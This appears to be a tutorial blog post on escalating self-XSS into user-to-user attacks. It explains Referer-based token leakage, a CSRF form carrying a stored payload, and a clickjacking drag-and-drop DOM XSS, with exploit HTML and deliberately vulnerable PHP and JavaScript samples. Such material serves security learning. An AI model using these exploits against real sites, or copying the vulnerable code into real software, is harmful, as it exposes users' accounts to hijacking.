Share on :
Self Cross site scripting(XSS) is a vulnerability in web applications which gives the ability of executing JS as the same user and not to other users.
Self-Reflected XSS occurs when a user is able to execute JS using the URL in his own account/browser only because of the existence of a variable(Ex: Token, userID,...etc) in the URL.
1- Self-Reflected XSS & token leakage : Self-Reflected XSS can be turned to a "User to user" reflected xss if the attacker could somehow obtain the token which is preventing him from exploiting the XSS. this scenarion is done through 2 steps :
leaking the token : A common scenario for this is leaking the token in the URL using an image embedded from an external source (Ex: sending an image in chat using the original url of the image). This leaks the token because when the image loads, the token will be sent in the referrer header of the HTTP request .
Sending the payload : Having the token, now the XSS can be done the same way a Reflected XSS is done by sending the URL containing the payload to the victim (Ex : https://vulnsite.com/<token>/profile?vulnparam= <payload>
)
Self-Stored XSS occurs when a user is able to add/change JS permanently in his own account/browser only (because of the existence of HTTP session tokens).
1- Self-Stored XSS & CSRF : Self-Stored XSS can be escalated to a "User to user" one if the vulnerable code for XSS is also vulnerable to CSRF in this scenario the attacker can craft an HTML form containing the payload and host it on his own website. Exploit code :
<!DOCTYPE html>
<html>
<body>
<form method="POST" action="//vulnerable.com/profile">
<input name="new_user" value=<payload> type="text">
<input type="submit">
</form>
</body>
</html>
</body>
vulnerable code (PHP) :
<?php
#requiring database connection and authentication files
require('db.php');
require('auth.php')
#authentication
if(isset($_POST['user']) and isset($_POST['pass'])){
authenticate($_POST['user'], $_POST['pass']);
echo "Hi".$_SESSION['user']
}
if(isset($_POST['new_user'])){
$change_name = $_POST['new_user']
$change = "UPDATE userdata SET username =:user WHERE username = :current";
$query = $pdo->prepare($change);
$query->execute(array(':user'=>$change_name, ':current'=>$_SESSION['user']));
$_SESSION['user'] = $change_name
}
?>
DOM Based XSS is when you have the ability to execute JavaScript only in your browser by only using JavaScript. This is entirely clientside and in some cases may never be sent to the server.
1- Self-Dom-based XSS & Clickjacking : Self-Dom-based XSS can be easily escalated to a "User to user" XSS if X-Frame-Options
header is not present by using ondragstart
event handler.
vulnerable code :
<script>
function setName() {
inputTxt = document.getElementsByName('firstName');
nameElem = document.getElementById('name');
nameElem.innerHTML = "Hello, " + inputTxt[0].value;
}
</script>
<input placeholder="Drop here" style="float: right; margin-right: 45%; margin-top:40px;" type="text" name="firstName" oninput="setName()" />
<div style="display: none;" id="name"></div>
Exploit code :
<iframe style="height: 50%; width: 100%; opacity: 0.7; " src="https://vulnsite.com/profile"></iframe>
<div style="position: absolute; float: right; left:40%; top:0" draggable="true" ondragstart="event.dataTransfer.setData('text/plain','<img src=x onerror=alert()>')"><h3>Drag Me!!</h3></div>